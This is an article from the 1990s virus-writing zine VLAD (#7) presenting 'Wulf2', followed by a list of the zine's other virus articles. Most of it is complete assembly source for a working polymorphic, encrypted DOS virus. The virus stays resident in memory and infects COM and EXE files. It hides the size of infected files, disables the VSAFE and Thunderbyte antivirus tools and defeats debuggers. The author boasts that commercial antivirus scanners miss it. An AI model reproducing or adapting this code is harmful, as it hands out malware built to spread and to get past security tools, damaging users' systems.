Virus Labs & Distribution
VLAD #7 - Wulf2

                       WULF2 is:

- Encrypted polymorphic TSR COM / EXE infector
- hides file size increases
- COMMAND.COM infection (if you don't want to infect it,
  just add 7,'COMMAND' in the unfriendly list)
- retro scanners
- disable TBAV
- 16 different encryption mechanisms (based on Rol, Ror and Xor)
- not too bad coding (well, I hope!)

Remove all infected files to cure your computer. That's all.

Further improvements ...
 - slower mutation speed
 - MCB stealth
 - file disinfection on read or 4b01h (debug)
 - code generation

* F-prot 2.21, AVPLITE 2.2, and THUNDERBYTE 7.00 catch nothing
  as they don't know how to decrypt it.
  (Tbav set the '@' flag because of the 'DEC SP' in the decryptor')
* AHA the new heuristic engine from Dr Solomon's FINDVIRU 7.56 manages
  to decrypt and detect it as a virus ...
  I'm not worried about it because it's very easy to change the main
  code in order not to be detected, that's what I've done in my
  SCREAM virus which is not encrypted and not detected heuristicaly !
  but the code becomes then around 100 bytes longer.

And now, 2 questions:

- Why doesn't the original dos handler work properly with the
  ah = 5701h function (I use dos version 6.22 and the same file gets
  infected again and again because the second stamp marker isn't set
  by the dos)

- Many viruses of the Vlad magazines use the following code
  to remain resident:
mov  ax,es
dec  ax
mov  ds,ax
cmp  byte ptr ds:[0],'Z'
jne  Dont_Install
sub  word ptr ds:[03h],Virus_Size
sub  word ptr ds:[12h],Virus_Size
mov  es,word ptr ds:[12h]
    etc ...

  BUT then the Upper memory becomes 0 (the UMB chain at 9fff:0 is killed)


* Before loadind the virus

--------------     -----      ----      ----
Conventional        640K       48K      592K
Upper       159K      159K        0K    <-- 159K 
Reserved    384K      384K        0K
Extended (XMS)   15 201K      164K   15 037K    

* AFTER loadind the virus

--------------     -----      ----      ----
Conventional        640K       48K      592K
Upper         0K        0K        0K    <-- all 0 !!?
Reserved    384K      384K        0K
Extended (XMS)   15 201K      164K   15 037K

==> One of the bad consequencies is that then windows is loaded
    in conventional memory, and just let you about 450K of free
    conventional memory.

Maybe you could answer this 2 questions in your next issue ...

Thank you for correcting my english which is far from perfect

;- WULF 2 -
;   by
; WereWolf
.model tiny     ;
.code   ;
.stack  ;
org     0eh     ;
  VirSize    =  (Vend - Vstart + 10h)/10h       ; it's + 10h ! (and no +0fh because we read
  VirLength  =  (Vcrypted - Vstart + 10h)       ; one more byte to encrypt the code)
  Marker     =  6 / 2   ; files with 6 seconds
WULF2:  jmp     Venter + 2      ;
Vstart: db      Vcrypted - Crypted dup (0)      ; reserved for the decryptor
Venter: mov     sp,bp   ;
in      al,21h  ;
push    ax ds es;
;--- check install ---  ;
mov     ax,52b3h;
out     21h,al  ; disable keyboard + clock
int     21h     ;
cld     ;
call    Install ;
;--- back to the host ---       ;
Host:   pop     es ds ax;
out     21h,al  ; enable keyboard + clock
lea     si,[bp+Buffer-Host]     ;
mov     di,100h ;
call    Test_Exe; are we attached to an exe ?
jne     Return_Com      ; so, we are attached to a com file
Return_Exe:     mov     ax,es   ;
add     ax,10h  ;
add     word ptr cs:[Jump+2],ax ;
db      5       ; add ax,xxxx
OldSS   dw      0       ;
cli     ;
mov     ss,ax   ;
db      0bch    ; mov sp,xxxx
OldSP   dw      0       ;
sti     ;
call    Clear_Reg       ;
db      0eah    ;
Jump    dd      0fff00000H      ;
;--- variables -----------------------------------------;
ComJump db      0e9h    ; jump for com file infection
Buffer  db      'MZ'    ; marker for exe file
db      19h dup (0)     ; also used for exe header
w512    dw      512     ; used to divide exe file's size
Stealth_Flag    db      1       ; Stealth ON / OFF
Sav24   db      0       ; first byte of int 24h handler
Return_Com:     push    di      ; di = 100h
movsw   ;
movsb   ;
Clear_Reg:      xor     ax,ax   ;
xor     bx,bx   ;
xor     cx,cx   ;
cwd     ; dx = 0
xor     di,di   ;
xor     si,si   ;
xor     bp,bp   ;
Bye:    ret     ;
;--- install virus in memory ---;
install:pop     bp      ;
push    bp      ;
jc      Bye     ; already installed
call    Kill_AV ; kill VSAFE & TBAV
mov     dx,ds   ; later used to find Dos entry
mov     ds,es:[bx-2]    ;
;--- disable int 1 & int 3 ---  ;
mov     al,0cfh ; code for IRET
xor     si,si   ;
mov     es,si   ;
les     di,dword ptr es:[si+4]  ;
stosb   ;
mov     es,si   ;
les     di,dword ptr es:[si+0ch];
stosb   ;
;--- allocate memory ---;
mov     di,3    ;
mov     ax,VirSize + 1  ;
Check_MCB:      cmp     byte ptr ds:[si],'M'    ;
je      Next_MCB;
cmp     byte ptr ds:[si],'Z'    ;
jne     Get_MCB ;
cmp     word ptr ds:[di],ax     ; not enough memory
jbe     Bye     ;
mov     byte ptr ds:[si],'M'    ;
sub     word ptr ds:[di],ax     ; ax = VirSize + 1
Next_MCB:       mov     bx,ds   ;
add     bx,ds:[di]      ;
inc     bx      ;
mov     ds,bx   ;
jmp     Check_MCB       ;
Get_MCB:mov     byte ptr ds:[si],'Z'    ;
mov     word ptr ds:[si+1],8    ; we are part of DOS system now
dec     ax      ;
mov     word ptr ds:[di],ax     ; ax = VirSize
push    ds      ;
pop     es      ;
;--- move in memory --- ;
push    cs      ;
pop     ds      ;
lea     di,Vstart       ;
lea     si,[bp+Vstart-Host]     ;
mov     cx,Vcrypted - Vstart    ;
   rep  movsb   ;
mov     ds,cx   ; ds = 0
;--- save initial int 21 address ---    ;
cli     ;
mov     si,84h  ; 0000:0084 (int 21)
push    si      ;
lea     di,Sav21;
movsw   ;
movsw   ;
pop     si      ;
lea     di,Real21       ;
movsw   ;
movsw   ;
;--- hook int 21h ---   ;
mov     word ptr [si-4],offset Int21    ;
mov     word ptr [si-2],es      ;
;Find Original DOS Entry ;
;----------------------- ;
;WereWolf thanks Satan's Little Helper   ;
;(article in VLAD#3)     ;
mov     ax,9090h; double-NOP
;--- int 30h trace ---  ;
mov     bx,0c0h ; ds:bx = 0000:00C0 = int 30h
call    Trace   ;
;--- psp trace ---      ;
mov     ds,dx   ; ds points on the current PSP
lds     bx,dword ptr ds:[6]     ; ds:0006 points the dos dispatch handler
;--- trace dos entry ---;
Trace:  cmp     byte ptr ds:[bx],0eah   ; is it JMP xxxx:xxxx ?
jne     Check_Dispatch  ;
lds     bx,ds:[bx+1]    ; point to xxxx:xxxx of the JMP
cmp     word ptr ds:[bx],ax     ; check for the double-NOP signature
jne     Trace   ;
sub     bx,32h  ; 32h byte offset from dispatch
cmp     word ptr ds:[bx],ax     ; is it the entry ? (double-NOP signature)
je      Entry_Found     ;
Check_Dispatch: cmp     word ptr ds:[bx],2e1eh  ; check for push ds, cs: override
jne     Trace_Failed    ;
add     bx,25h  ; 25h byte offset from dispatch
cmp     word ptr ds:[bx],80fah  ; check for cli, push ax
jne     Trace_Failed    ;
Entry_Found:    mov     word ptr es:Real21,bx   ; save the dos entry
mov     word ptr es:Real21+2,ds ;
Trace_Failed:   ret     ;
;Kill VSAVE & TBAV       ;
;-----------------       ;
;WereWolf greets Vyvojar for this code   ;
Tbname  db      'TBMEMXXX','TBCHKXXX'   ; thunderbyte's drivers
db      'TBDSKXXX','TBFILXXX'   ;
Kill_AV:push    ax bx cx dx di ds es    ;
mov     ah,0ffh ;
xor     bl,bl   ;
int     13h     ;
mov     ah,0feh ;
int     13h     ;
;--- kill VSAFE ---     ;
mov     ax,0fa02h       ;
mov     dx,5945h;
mov     bl,31h  ;
int     16h     ;
;--- kill TBAV ---      ;
push    cs      ;
pop     ds      ;
mov     ah,52h  ;
int     21h     ;
les     bx,es:[bx+22h]  ;
Search_Device:  lea     si,[bp + Tbname - 8 - Host]     ;
mov     cx,4    ;
Search_Utility: push    cx      ;
add     si,8    ;
lea     di,[bx+0ah]     ;
mov     cl,4    ;
push    si      ;
repe    cmpsw   ;
pop     si cx   ;
loopne  Search_Utility  ;
jne     Next_Device     ;
or      byte ptr es:[16h],1     ; eliminates TB utility
Next_Device:    les     bx,es:[bx]      ;
cmp     bx,-1   ;
jne     Search_Device   ;
pop     es ds di dx cx bx ax    ;
ret     ;
;--- Signature ---      ;
   VirusName    db      "[WULF2]",0     ; it has to be put somewhere
    VirusDad    db      "İ1996 WereWolf",0      ; so why not here ??
;               NEW  INT 21H  HANDLER   ;
Int21:  sti     ;
cmp     ax,52b3h; self-check install ?
jne     Intercept0      ;
stc     ;
jmp     Retf2   ;
Intercept0:     push    ax      ; save ax
xor     ah,11h  ; ah=11h find first FCB
jz      Stealth ;
xor     ah,3    ; ah=12h find next  FCB
jz      Stealth ;
xor     ah,5ch  ; ah=4eh find first Handle
jz      Stealth ;
xor     ah,1    ; ah=4fh find next Handle
jnz     Intercept1      ;
Stealth:pop     ax      ;
mov     byte ptr cs:Buffer,ah   ; save ah
call    i21     ;
jc      Retf2   ;
pushf   ;
cmp     byte ptr cs:Stealth_Flag,0      ; Stealth ON ?
jz      Popf_Retf2      ;
push    ax bx si di ds es       ;
mov     ah,2fh  ;
call    i21     ;
push    es      ;
pop     ds      ;
mov     di,16h  ;
mov     si,1ah  ;
cmp     byte ptr cs:Buffer,12h  ;
ja      S1      ;
inc     di      ; di = 0017h
mov     si,1dh  ;
cmp     byte ptr ds:[bx],0ffh   ; is it a large FCB ?
jne     S0      ;
add     bx,7    ; yes, so translate
S0:     cmp     word ptr ds:[bx+9],'XE' ;
je      S1      ;
cmp     word ptr ds:[bx+9],'OC' ;
jne     Return_Stealth  ;
S1:     mov     ax,ds:[bx+di]   ; ax = file time
and     al,1fh  ; show seconds
cmp     al,Marker       ;
jne     Return_Stealth  ; not infected
les     ax,dword ptr ds:[bx+si] ;
mov     di,es   ;
sub     ax,VirLength    ;
sbb     di,0    ;
jc      Return_Stealth  ; too small to have been infected
S2:     mov     ds:[bx+si],ax   ;
mov     ds:[bx+si+2],di ;
Return_Stealth: pop     es ds di si bx ax       ;
Popf_Retf2:     popf    ;
Retf2:  retf    2       ;
Intercept1:     xor     ah,4    ; ah=4bh program execution
jz      Execution       ;
xor     ah,7    ; ah=4ch end program
jz      Stealth_ON      ;
xor     ah,7dh  ; ah=31h tsr function
jnz     J21     ;
push    bp      ;
lea     bp,Host ;
call    Kill_AV ; kill VSAFE & TBAV
pop     bp      ;
Stealth_ON:     mov     byte ptr cs:Stealth_Flag,1      ; Stealth On
J21:    jmp     Jump21  ;
Execution:      cmp     al,1    ; we don't want special
ja      J21     ; exec functions
push    bx cx bp si di es dx ds ;
xor     bp,bp   ;
;--- disable keyboard & timer ---       ;
in      al,21h  ;
or      al,3    ;
out     21h,al  ;
;--- inactive int 3h & int 24h---       ;
mov     al,0cfh ; CF = code for IRET
mov     es,bp   ; es = 0
les     di,dword ptr es:[bx+0ch];
stosb   ;
mov     es,bp   ; es = 0
les     di,dword ptr es:[90h]   ;
xchg    byte ptr es:[di],al     ;
mov     byte ptr cs:Sav24,al    ;
;--- get attribute ---  ;
mov     ax,4300h; ax = 4300h
call    i21     ;
push    cx      ; save attribute
;--- point file name ---;
mov     si,dx   ; ds:si points to file's name
cld     ;
Scan_Fname1:    lodsb   ;
or      al,al   ;
jnz     Scan_Fname1     ;
Scan_Fname2:    dec     si      ;
cmp     byte ptr [si-1],'\'     ;
je      Check_Fname0    ;
cmp     byte ptr [si-1],'/'     ;
jne     Scan_Fname2     ;
;--- check for unfriendly programs ---  ;
Check_Fname0:   push    cs      ;
pop     es      ;
xor     cx,cx   ;
lea     di,ProgList     ;
Check_Fname1:   mov     cl,byte ptr cs:[di]     ;
jcxz    Open_File       ; end of list ?
inc     di      ;
mov     ax,di   ;
add     ax,cx   ;
push    ax si   ;
Check_Fname2:   lodsb   ;
cmp     al,'a'  ;
jb      Check_Fname3    ;
cmp     al,'z'  ;
ja      Check_Fname3    ;
sub     al,('a'-'A')    ; convert 'a' to 'A', 'b' to 'B' etc ...
Check_Fname3:   scasb   ;
loope   Check_Fname2    ;
pop     si di   ;
jne     Check_Fname1    ;
cmp     di,offset EndProgList   ;
jb      JRestore_2      ;
Stealth_OFF:    mov     byte ptr cs:Stealth_Flag,0      ; Stealth OFF for F-PROT & CHKDSK
je      Open_File       ; if di=EndProgList then ds:si='CHKDS'
JRestore_2:     jmp     Restore_2       ; else ds:si='F-'
Open_file:      ;
;--- set r/w access --- ; cx = 0 after Check_Fname routine
mov     ax,4301h; ax = 4301h
call    i21     ;
jc      JRestore_2      ;
;--- r/w open file ---  ;
mov     ax,3d02h;
call    i21     ;
jc      JRestore_2      ;
xchg    bx,ax           ;
push    cs      ;
pop     ds      ; ds = cs
;--- read file ---      ;
lea     dx,Buffer       ;
mov     si,dx   ;
mov     cx,1bh  ;
mov     ah,3fh  ;
call    i21     ;
jc      Restore_1       ;
;--- read date & time ---       ;
mov     ax,5700h;
call    i21     ;
jc      Restore_1       ;
;--- test file for infection ---;
mov     ax,cx   ;
and     al,1fh  ;
cmp     al,Marker       ;
je      Restore_1       ;
;--- test if valid exe ---      ;
call    Test_Exe; is it an exe file ?
je      Exe_File;
push    cx dx   ; save Time & Date
call    Infect_Com      ;
jmp     Restore ;
Exe_File:       cmp     byte ptr [si+18h],40h   ; No new exe header (windows)
je      Restore_1       ;
cmp     byte ptr [si+1ah],0     ; No overlays
jne     Restore_1       ;
push    cx dx   ; save Time & Date
call    Infect_Exe      ;
Restore:pop     dx cx   ; restore Time & Date
jc      Restore_0       ; any problem occured ?
;--- mark the file ---  ;
and     cx,0ffe0h       ;
or      cl,Marker       ;
;--- restore date & time ---    ;
Restore_0:      mov     ax,5701h; for some reasons
;--- Normal int 21h call ---    ; this Dos function doesn't
pushf   ; work using the Dos entry
db      9ah     ; that's why we use a normal
Sav21   dd      0       ; Dos call
Restore_1:      mov     ah,3eh  ; close file
call    i21     ;
Restore_2:      pop     cx ds dx; restore attribute
mov     ax,4301h;
call    i21     ;
;--- restore int 24h ---;
Rest_Int24:     mov     al,byte ptr cs:Sav24    ;
mov     es,bp   ;
les     di,dword ptr es:[90h]   ;
mov     byte ptr es:[di],al     ;
;--- enable keyboard & timer ---;
in      al,21h  ;
and     al,0fch ;
out     21h,al  ;
pop     es di si bp cx bx       ; restore registers
Jump21: pop     ax      ;
cli     ;
jmp     dword ptr cs:Sav21      ; jump to int 21h
;--- test if EXE ---    ;
Test_Exe:       cmp     word ptr cs:[si],'ZM'   ; look for 'MZ'
je      Test_End;
cmp     word ptr cs:[si],'MZ'   ; look for 'ZM'
Test_End:       ret     ;
;--- MUTATION ENGINE -----------------------------------;
Mxchg0: cli     ;
mov     bp,sp   ;
Mxchg1: cli     ;
xchg    sp,bp   ;
Mxchg2: cli     ;
xchg    bp,sp   ;
cli     ;
Random1 dw      0       ;
Random2 dw      0       ;
Infect: push    bx si dx ax     ;
;--- get random values ---      ;
GetKey: xor     dx,dx   ;
mov     es,dx   ;
les     dx,es:[46ch]    ; bios timer
;--- mutate decryptor ---       ;
Mut0:   mov     cx,es   ;
add     ax,cx   ;
add     ax,dx   ;
mov     word ptr Random1,dx     ; save random values
mov     word ptr Random2,ax     ;
push    cs      ;
pop     es      ; es = ds = cs
lea     di,Crypted      ;
and     ax,1    ;
cmp     dh,80h  ;
ja      Mut1    ;
inc     ax      ;
Mut1:   mov     si,ax   ;
add     si,si   ;
add     si,ax   ; si = 3 * ax
lea     si,[si+Mxchg0]  ;
cmp     dh,dl   ;
jb      Mut2    ;
inc     si      ;
Mut2:   movsw   ; xchg bp,sp (or mov bp,sp etc ...)
movsb   ; cli
inc     di      ; jump the mov sp,
pop     ax      ;
stosw   ; InitSP
add     al,dl   ;
adc     ah,0    ;
add     ax,Vcrypted - Venter + 1;
mov     word ptr EndSP,ax       ; EndSP
and     dx,7    ;
mov     ax,dx   ;
add     ax,0d0c0h       ;
xchg    ah,al   ; rol byte,1
mov     cx,ax   ;
and     ch,4    ; rol a.,1
add     ch,0c0h ;
mov     bx,8    ;
cmp     byte ptr Random2 + 1,80h;
jb      Mut3    ;
xchg    bh,bl   ;
Mut3:   add     ah,bh   ;
add     ch,bl   ;
mov     word ptr Func2,cx       ;
mov     bx,dx   ;
mov     cx,3    ;
and     bl,cl   ;
add     bl,58h  ;
xchg    bx,ax   ;
stosb   ; pop
sub     al,8    ;
push    ax      ; save associated push
xchg    bx,ax   ;
stosw   ; rol or ror
and     dx,cx   ;
mov     ax,dx   ;
shl     ax,cl   ;
add     ax,dx   ; ax = 9 * dx
xchg    ah,al   ;
mov     cx,0c432h       ; xor al,ah
add     ax,cx   ; xor .l,.h
cmp     byte ptr Random1,80h    ;
jb      Mut4    ;
add     ah,1ch  ;
add     ch,1ch  ;
Mut4:   mov     word ptr Func1,cx       ; xor ah,al or xor al,ah
stosw   ; xor .h,.l or xor .l,.h
pop     ax      ;
stosb   ;
mov     bx,word ptr Random2     ;
push    bx      ;
cmp     bh,bl   ;
jb      Mut5    ;
mov     ax,word ptr Func1       ;
xchg    ax,word ptr Func2       ;
mov     word ptr Func1,ax       ;
mov     ax,word ptr F1  ;
xchg    ax,word ptr F2  ;
mov     word ptr F1,ax  ;
Mut5:   and     bx,7    ;
cmp     bl,4    ; no pop sp !
je      Mut6    ;
cmp     bl,5    ; no pop bp !
jne     Mut7    ;
Mut6:   inc     bx      ;
inc     bx      ;
Mut7:   mov     ax,bx   ;
add     ax,4c58h; dec sp + pop ..
pop     bx      ;
and     bh,1    ;
jz      Mut8    ;
xchg    ah,al   ; dec sp <-> pop ..
Mut8:   stosw   ;
add     di,4    ;
mov     al,72h  ; jb
cmp     bl,80h  ;
jb      Mut9    ;
mov     al,76h  ; jbe
Mut9:   stosb   ;
;--- encrypt virus ---  ;
Encrypt:mov     si,di   ; di = Vcrypted - 1
mov     cx,Vcrypted - Venter    ;
add     di,cx   ;
std     ;
lodsb   ;
inc     si      ;
E0:     xchg    ah,al   ;
lodsb   ;
Func1   dw      0       ;
Func2   dw      0       ;
stosw   ;
inc     di      ;
loop    E0      ;
cld     ;
;--- write encrypted code ---   ;
pop     di      ;
lea     dx,[Crypted-10h-di]     ;
mov     cx,VirLength    ;
pop     si bx   ;
jmp     Write_File      ;
;--- Unfriendly programs -------------------------------;
ProgListdb      5,'CLEAN',3,'AVP',2,'TB',1,'V'  ;
db      4,'SCAN',3,'NAV',3,'IBM';
db      5,'FINDV',5,'GUARD',2,'FV'      ;
db      6,'CHKDSK'      ; CHKDSK can be infected
EndProgList     db      2,'F-',0;
;--- EXE infection -------------------------------------;
Infect_Exe:     les     ax,dword ptr [si+14h]   ; save old CS:IP
mov     word ptr [Jump],ax      ;
mov     word ptr [Jump+2],es    ;
les     ax,dword ptr [si+0eh]   ; save old SS:SP
mov     word ptr OldSP,es       ;
mov     word ptr OldSS,ax       ;
mov     al,2    ; move pointer to
call    Move_ptr; the end of file
push    ax dx   ; save file size
xchg    di,ax   ;
mov     cx,dx   ;
mov     ax,word ptr [si+4]      ;
dec     ax      ;
mul     w512    ;
add     ax,word ptr [si+2]      ;
adc     dx,bp   ;
sub     ax,di   ;
sbb     dx,cx   ;
pop     dx ax   ;
jc      Return  ; internal overlays detected
push    ax dx   ;
mov     di,[si+8]       ; header size in paragraphs
mov     cl,4    ;
shl     di,cl   ; multiply by 16
sub     ax,di   ; header size - file size
sbb     dx,bp   ; now DX:AX=file size - header size
mov     cx,10h  ; DX:AX/CX=AX remainder DX
div     cx      ;
mov     [si+14h],cx     ; IP offset
mov     [si+16h],ax     ; CS displacement in module
inc     ax      ;
mov     [si+0eh],ax     ; SS displacement
mov     byte ptr [si+11h],cl    ; starting SP
mov     ax,Vcrypted - Crypted   ;
call    Infect  ;
pop     dx ax   ; restore file size
jc      Return  ;
add     ax,cx   ; cx = Vend - Vstart + 10h
adc     dx,bp   ;
div     w512    ;
or      dx,dx   ;
jz      End_Infect      ;
inc     ax      ;
End_Infect:     mov     [si+2],dx       ; number of 512 pages
mov     [si+4],ax       ; number of bytes in last page
xor     ax,ax   ; move pointer
call    Move_Ptr; to the bigining of the file
mov     dx,si   ; write new header
mov     cl,18h  ;
Write_File:     mov     ah,40h  ;
;--- Real int 21h call ---      ;
i21:    pushf   ;
db      9ah     ;
Real21  dd      0       ;
Return: ret     ;
;--- Move file pointer ---      ;
Move_Ptr:       mov     ah,42h  ;
cwd     ;
xor     cx,cx   ;
jmp     i21     ;
;--- COM Infection -------------------------------------;
Infect_Com:     mov     al,2    ; move pointer to the
call    Move_ptr; end of file
or      dx,dx   ; size > 64k ?
stc     ;
jnz     Return  ;
cmp     ax,64000 - VirLength    ;
ja      Return  ; Not too big
sub     ax,3    ;
jc      Return  ; but not too small
push    ax      ; save file size
add     ax,Vcrypted - Crypted + 103h    ;
mov     dl,10h  ;
call    Infect  ;
pop     word ptr ds:[si]; set jump address
jc      Return  ;
xor     ax,ax   ; move pointer to the
call    Move_Ptr; bigining of the file
mov     dl,ComJump - Vstart + 10h       ; dx = offset ComJump
mov     cl,3    ;
jmp     Write_File      ; write jump
;--- Decryptor -----------------------------------------;
Crypted:cli     ;
mov     bp,sp   ;
db      0bch    ; mov sp,xxxx
InitSP  dw      0       ;
M0:     pop     ax      ;
F1      dw      0       ;
F2      dw      0       ;
push    ax      ;
pop     bx      ;
dec     sp      ;
dw      0fc81h  ; cmp sp,xxxx
EndSP   dw      0       ;
jb      M0      ;
Vcrypteddb      Vcrypted - Venter dup (0)       ; crypted form
Vend:   ;===============================================;
end     WULF2   ;



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ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals


VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus


Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

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